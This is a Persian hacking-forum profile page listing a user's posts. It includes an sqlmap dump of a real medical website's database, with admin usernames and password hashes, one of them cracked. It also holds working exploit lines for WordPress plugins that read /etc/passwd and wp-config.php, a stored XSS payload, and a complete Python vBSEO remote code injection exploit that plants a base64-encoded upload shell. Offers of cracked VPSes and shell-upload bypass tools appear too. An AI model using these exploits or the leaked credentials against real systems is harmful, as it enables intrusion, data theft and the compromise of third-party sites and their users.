با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.
-
تعداد ارسال ها
79 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
1
نوع محتوا
نمایه ها
تالارهای گفتگو
تقویم
Articles
بخش دریافت
تمامی مطالب نوشته شده توسط Aboozar
-
Target Trainings
Ara MarMolak پاسخی برای موضوع ارسال کرد برای یک Aboozar در ابزارهای امنیتی و آنالیز سیستم ها
درود فراوان http://www.takecare.com.bd/tips.php?tid=5 http://www.takecare.com.bd/admin web application technology: PHP 5.3.29 back-end DBMS: MySQL >= 5.0.0 =================================================== available databases [2]: [*] information_schema [*] takecare_mtakecare =================================================== Database: takecare_mtakecare [59 tables] +-------------------------------------------+ | ambulance_service_types | | ambulance_services | | chambers | | contact_types | | countries | | currencies | | departments | | doctor_chamber_visitings | | doctor_chambers | | doctor_hospital_visitings | | doctor_hospitals | | doctor_languages | | doctor_specialities | | doctor_statuses | | doctor_titles | | doctor_types | | doctors | | genders | | hospital_ambulance_services | | hospital_contacts | | hospital_departments | | hospital_galleries | | hospital_gallery_images | | hospital_laboratory_test_charts | | hospital_location_maps | | hospital_promotion_package_rates | | hospital_promotion_package_specifications | | hospital_promotion_package_types | | hospital_promotion_packages | | hospital_room_rents | | hospital_room_types | | hospital_specialities | | hospital_statuses | | hospital_types | | hospitals | | laboratorytests | | languages | | location_levels | | locations | | login_tokens | | map_option_templates | | marital_statuses | | medicine_service_offers | | medicine_service_specialities | | medicine_service_types | | medicine_services | | page_image_slider_categories | | page_image_sliders | | page_menus | | page_stuff_categories | | page_stuffs | | photo_album_images | | photo_albums | | physician_types | | registration_statuses | | user_group_permissions | | user_groups | | users | | weekdays | +-------------------------------------------+ ================================================= Table: users [4 entries] +----------+ | username | +----------+ | admin | | akbar | | amal | | habib | +----------+ Table: users [4 entries] +-----------------------------------------------+ | password | +-----------------------------------------------+ | 1dec01141f9bfe969491af6e63ae1a14 (adminuser1) | | b1c503a64379f4f366a48bfe35d1757d | | d62d41cf17704ddd6cb22c9688130f73 | | f5dc036b9e98fcd1db88d8c76b353d56 | +-----------------------------------------------+- 1,520 پاسخ
-
- target
- target traning
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
درود باتشکر از فعالیت مفید دوست عزیزمون. در پناه حق./
-
Formcraft Plugin File Upload
MR.SHDOVV پاسخی برای موضوع ارسال کرد برای یک Aboozar در ( Remote File Upload ( RFU
درود فراوان. دوست عزیز پسورد فایل رو هم قرار بدین. یاحق./ -
درود maltego رو در کالی لینوکس براتون آموزش میدیم. اول در سایت : https://www.paterva.com/web6/community/maltego/ مقاله زیر مطالعه کنید. لینک دانلود : http://s7.picofile.com/file/8244512134/information_gathering_by_maltego_2_.pdf.html یاحق./
-
درود یکی از دوستان خواسته بودن باز کردن پورت رو بهشون نشون بدم که طی آموزش گفتیم یه فیلمی هم بگیریم بزاریم سایت. با تشکر./ http://s6.picofile.com/file/8244212876/open_port_in_vps.rar.html
-
security Backconnect Via Vps
یک موضوع پاسخی ارسال کرد برای Aboozar در ویدیو های آموزشی آزمایشگاه امنیت
درود. یکی از دوستان در یاهو درخواست این آموزش رو کرده بودن . گفتم فیلم بگیرم در آرشیو انجمن هم قرار بدیم. قابل توجه برخی از دوستان! کار شاخی نیست!!! فقط یه لوگین به vps اضافه این کار هست. http://s7.picofile.com/file/8240342868/bc_via_vps.avi.html -
سرور مجازی رایگان | VPS Free
MOHAMAD-NOFOZI پاسخی برای موضوع ارسال کرد برای یک Aboozar در سرور مجازی (VPS)
-
درود با آغاز شدن سال 2016 میلادی تیم توسعه Kali Linux نسخه جدید و آپدیت شده سیستم عامل کالی لینوکس را بر روی سایت خود قرار دادند که مشکلات نسخه قبلی این سیستم عامل بر طرف شده است و علاقه مندان به کالی لینوکس میتواند نسخه جدید این سیستم عامل را دانلود کنند. برای اطلاعات بیشتر به لینک زیر مراجعه فرمایید: کلیک کنید!
-
question سوال در مورد پورت های باز سرور لینوکس
عرفان رضایی پاسخی برای موضوع ارسال کرد برای یک Aboozar در Server Security Q/A
درود. باتشکر از فعالیت همه دوستان. دوستان عزیزی که پاسخی نمیتونند به سوال کاربران بدن لطفا پست نزنن. اسپم محسوب میشه. تکرار مجدد باعث دریافت اخطار میشه. باتشکر./ -
Forbidden Error Bypass Via Perl Based Symlink
Uzun DZ پاسخی برای موضوع ارسال کرد برای یک Aboozar در تحلیل و بررسی آسیب پذیری های سایت و سرورها
درود لینک پیکوفایل فیلم خدمت دوستان: http://s6.picofile.com/file/8228618234/Forbidden_Error_Bypass_Via_Perl_Based_Symlink_R3d_C0d3r_YouTube.mp4.html -
تاپیک جامع Local Roots
Dragon پاسخی برای موضوع ارسال کرد برای یک Aboozar در ابزار و اسکریپت های امنیتی
درود دوست عزیز این تایپیک برای 5 ماه پیشه. صبر کنید اگه استارتر تایپیک اومد خودشون قرار میدن. یا راه هایی هست برای پسورد توی گوگل سرچ کنید. یاعلی./ اسپم ها بزودی پاک میشن.// -
security آموزش SSI Injection
0x3a پاسخی برای موضوع ارسال کرد برای یک Aboozar در تحلیل و بررسی آسیب پذیری های سایت و سرورها
درود. عذر میخوام بخواطر فعالیت کم بنده . به علت مشغله کاری و کلاس های درسی هست. خب باتشکر از دوست خوبمون که این آموزش رو قرار دادن. یه کلیپ در آرشیوم بود در مورد این آسیب پذیری براتون قرار میدم. http://s1.picofile.com/file/8228249318/SSI_Injection_1.MP4.html- 4 پاسخ
-
- 1
-
-
درود بعلت اینکه درخواست هایی هست از طرف کاربران گرامی در مورد vps کرک شده. این تایپیک رو بازکردیم که دوستان اطلاع بدن . بنده و سایر دوستانی که در این زمینه فعالیت دارن از طریق پیام خصوصی برای افراد ارسال کنیم. نکته مهم ! دوستان توجه داشته باشند. وی پی اس فقط به افرادی تعلق میگیره که در انجمن بالای 5 پوست مفید داشته باشند. و فقط یک بار تعلق خواهد گرفت. هرگونه درخواست پی در پی و یا اسپم با برخورد رو به رو خواهد شد. باتشکر./
-
Anti sheller bypasser V2
یک موضوع پاسخی ارسال کرد برای Aboozar در تحلیل و بررسی آسیب پذیری های سایت و سرورها
درود آموزش هایی توی انجمن دوستان عزیز گذاشتن که یه متد دیگه رو هم واستون قرار میدم. روش همونه فقط کد نویسی بایپسر فرق کرده. خب دو فایل میزارم براتون آپلود کنید . کار تمام./ http://s3.picofile.com/file/8221245642/antisheller.rar.html -
حداکثر فشرده سازی فایل
Aboozar پاسخی برای موضوع ارسال کرد برای یک Aboozar در ویدیو های آموزشی آزمایشگاه امنیت
با درود فراوان. شما ميتونيد آخرين ورژن رو دانلود كنيد.كه با يك سرچ در گوگل پيدا ميشه. و نيز شما ميتونيد با كمي تحقيق بيشتر در زمينه فشرده سازي فايل ها اطلاعات كسب كنيد متد هاي زيادي واسه اين كار هست. ياعلي./ -
WordPress WPTF Image Gallery 1.03 - Aribtrary File Download
یک موضوع پاسخی ارسال کرد برای Aboozar در Web Application Exploits
Title: Remote file download vulnerability in wptf-image-gallery v1.03 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-17 Download Site: https://wordpress.org/plugins/wptf-image-gallery Vendor: https://profiles.wordpress.org/sakush100/ Vendor Notified: 0000-00-00 Vendor Contact: [email protected] Description: WordPress True Fullscreen (WPTF) Gallery is a modern gallery plugin that supports true fullscreen and have a lot of features built with it. Vulnerability: The ./wptf-image-gallery/lib-mbox/ajax_load.php code doesn't sanitize user input or check that a user is authorized to download files. This allows an unauthenticated user to download sensitive system files: 1 <?php 2 error_reporting(0); 3 $homepage = file_get_contents($_GET['url']); 4 $homepage = str_replace("script", "mboxdisablescript", $homepage); 5 $homepage = str_replace("SCRIPT", "mboxdisablescript", $homepage); 6 echo $homepage; 7 ?> CVEID: OSVDB: Exploit Code: • $ curl http://server/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd -
آموزش های تصویری امنیت وردپرس
Aboozar پاسخی برای موضوع ارسال کرد برای یک Aboozar در آموزش تصویری رفع آسیب پذیری سایت و سرورها
با درود فراوان ! با آرزوي قبولي نماز و روزه هاي شما كاربران گرامي ! اين پارت از آموزش پوشه wp-content تغيير ميديم.زياد توضيح نميدم همه چيز توي فيلم واضح هست. باتشكر./ لينك دانلود: كليك كنيد! -
دوست عزیز شما میتونید با ابزار آرمیتیج ویندوز تارگت رو مورد نفود قرار بدین که بحثش در انجمن موجوده یه سرچ کنید. با تشکر./
-
..:: بررسی باگ ها ::..
یک موضوع پاسخی ارسال کرد برای Aboozar در تحلیل و بررسی آسیب پذیری های سایت و سرورها
درود دوستان عزیز ما در این تایپیک سعی میکنیم باگ هایی که نام بردیم رو تشریح کنیم و با قرار دادن تارگت هایی دوستان عزیز تازه کار رو بیشتر آشنا کنیم. دوستان عزیز ما آموزش شل گیری با هر یک از این باگ ها رو قرار میدیم. تاکید میکنم هیچ گونه سوالی یا اسپمی در این تایپیک نزنید. تایپیک رو با هماهنگی ادامه میدیم تا تایپیک فولی داشته باشیم. باگ های متفاوت رو باهم بررسی خواهیم کرد و با آموزش دسترسی رو از هر کدام از باگ ها بگیریم. با تشکر./ -
تاپیک جامع آموزش های مرتبط با Back Track و Kali Linux
root3r پاسخی برای موضوع ارسال کرد برای یک Aboozar در GNU /Linux
درود دوست عزیز شما میتونید با مراجعه به سایت کالی اون رو دانلود کنید. و چون فروش اون در فروشگاه های ایران غیر مجازه میتونید آخرین ورژن اون رو از فروشگاه های معتبر اینترنتی خرید کنید. ./ -
نسخه 4.2 وردپرس و باگ WordPress 4.2 Stored XSS
یک موضوع پاسخی ارسال کرد برای Aboozar در اخبار دنیای امنیت
نسخه فعلی وردپرس یعنی ورژن 4.2 که چند روز پیش منتشر شد دارای آسیب پذیری XSS میباشد مهاجم با ارسال کد جوا اسکریپت در قسمت نظرات میتواند کنترل وب سایت وردپرسی را در دست بگیرد. با حفره Cross Site Script مهاجم می تواند رمز عبور مدیر را تغییر یا حساب کاربری جدیدی در سایت ایجاد کند و یا انجام هر چیز دیگری که مدیر در حال حاضر وارد شده می تواند بر روی سیستم هدف انجام دهد. آسیب پذیری جدید XSS در این ورژن به تازگی منتشر شده که سایت های وردپرسی مورد حمله نفوذگر ها قرار داده است. این آسیب پذیری مشابه در نوامبر 2014 توسط Klikki هم در ورژن های قبل منتشر شده بود. در حال حاضر وردپرس ورژن های 4.2, 4.1.2, 4.1.1, 3.9.3. تمامی آسیب پذیر میباشد. <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a> منبع: InterNet Security -
Wordpress Creative Contact Form Upload Vulnerability
Sir.h4m1D پاسخی برای موضوع ارسال کرد برای یک Aboozar در Web Application Exploits
درود با استفاده از metaspolit آموزشش فکر کنم در انجمن هست. نبود میتونید یه سرچی در موتور های جستجوگر کنید./ -
WP Marketplace 2.4.0 Remote Code Execution (Add WP Admin)
MOHAMAD-NOFOZI پاسخی برای موضوع ارسال کرد برای یک Aboozar در Web Application Exploits
درود یکم توی کد ها نگاه کنید میفهمید. دروک مربوط به گوگل : index of "wpmarketplace" هست بعد از سرچ اسکریپت که به زبان پایتون نوشته شده رو اجرا کنید و ادامه کار .... تمام./ -
آسیب پذیری در پلاگین slider-revolution
یک موضوع پاسخی ارسال کرد برای Aboozar در Web Application Exploits
درود امروزه شاهد آسیب پذیری جدید در پلاگین slider-revolution وردپرس میشیم که به راحتی میشه فایل کانفینگ رو دانلود کرد. دروک: revslider.php "index of" exploite http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php -
#!C:\Python\python.exe # vBSEO 3.6.0 "proc_deutf()" Remote PHP Code Injection Exploit # Coded By xSecurity # Sec4ever.com # Greets To : UzunDz - Sec4ever - RAB3OUN - Lov3rDNS - Mr.Dm4r - HaNiBaL KSA - DeeF import urllib, urllib2, sys, os t = ''' __ _ _ __ __/ _\ ___ ___ _ _ _ __(_) |_ _ _ \ \/ /\ \ / _ \/ __| | | | '__| | __| | | | > < _\ \ __/ (__| |_| | | | | |_| |_| | /_/\_\\__/\___|\___| \__,_|_| |_|\__|\__, | |___/ [~] |vBSEO 3.6.0 "proc_deutf()" Remote PHP Code Injection Exploit [~] |CodedBy xSecurity | sec4ever.com [~] |To|UzunDz|Sec4ever|RAB3OUN|Lov3rDNS|Mr.Dm4r|HaNiBaL-KSA|DeeF [!] Usage: python vbseo.py target.com [without http://]''' print t url = sys.argv[1] # change uploader from here / encrypt base64 shell = 'CSR1cCA9IGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFLWldOb2J5QW5QSFJwZEd4bFBsVndiRzloWkNCR2FXeGxjeUI0VTJWamRYSnBkSGs4TDNScGRHeGxQaWM3Q21WamFHOGdKenhtYjNKdElHRmpkR2x2YmowaUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW0xMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFaUlHNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWEJzYjJGa1pYSWlQaWM3Q21WamFHOGdKenhwYm5CMWRDQjBlWEJsUFNKbWFXeGxJaUJ1WVcxbFBTSm1hV3hsSWlCemFYcGxQU0kxTUNJK1BHbHVjSFYwSUc1aGJXVTlJbDkxY0d3aUlIUjVjR1U5SW5OMVltMXBkQ0lnYVdROUlsOTFjR3dpSUhaaGJIVmxQU0pWY0d4dllXUWlQand2Wm05eWJUNG5Pd3BwWmlnZ0pGOVFUMU5VV3lkZmRYQnNKMTBnUFQwZ0lsVndiRzloWkNJZ0tTQjdDZ2xwWmloQVkyOXdlU2drWDBaSlRFVlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlJrbE1SVk5iSjJacGJHVW5YVnNuYm1GdFpTZGRLU2tnZXlCbFkyaHZJQ2M4WWo1VmNHeHZZV1FnUTI5dGNHeGhkR1VnSVNFaFBDOWlQanhpY2o0OFluSStKenNnZlFvSlpXeHpaU0I3SUdWamFHOGdKenhpUGxWd2JHOWhaQ0JHWVdsc1pXUWdJU0VoUEM5aVBqeGljajQ4WW5JK0p6c2dmUXA5Q2o4KyIpOwoJJHggPSBmaWxlX3B1dF9jb250ZW50cygieHNlYy5waHAiLCAkdXApOwoJaWYoJHgpIHsgCglwcmludCAnc2VjNGV2ZXInOyAKCX0gZWxzZSB7IAoJCSRmcCA9IGZvcGVuKCd4c2VjLnBocCcsJ3cnKTsgCgkJZndyaXRlKCRmcCwkdXApOyAKCX0=' def target(url,shell): try: ss = open('rzu.txt', 'a') req = urllib2.Request('http://www.'+url+'/vbseocp.php', headers={'Code':'ZWNobyAneFNlY3VyaXR5Jzs='}) post = urllib.urlencode({"char_repl":"'{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"}) opener = urllib2.build_opener() b0x = opener.open(req,post).read() if 'xSecurity' in b0x: print '\n[+] '+url+'\n[+] vBSEO Infected ..\n[+] Trying Inject Uploader ..' ups = urllib2.Request('http://www.'+url+'/vbseocp.php', headers={'Code':shell}) inj = opener.open(ups,post).read() if 'sec4ever' in inj: rezult = '[!] Shell Has Been Created: '+url+'/xsec.php\n' print rezult ss.write(rezult) else: print '\n[~] Cannot Create Shell Use Manual Trick\n' else: print '\n[~] Not Infected ..\n' except urllib2.URLError, e: print '\n[*] '+url+'\n[*] '+str(e) print '[*] Use Manual Trick\n' pass target(url,shell)
تاریخچه انجمن امنیتی ایران سایبر
شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.
این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.
آدرس های داخلی شرکت
آدرس های داخلی شرکت
رعایت قوانین
شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.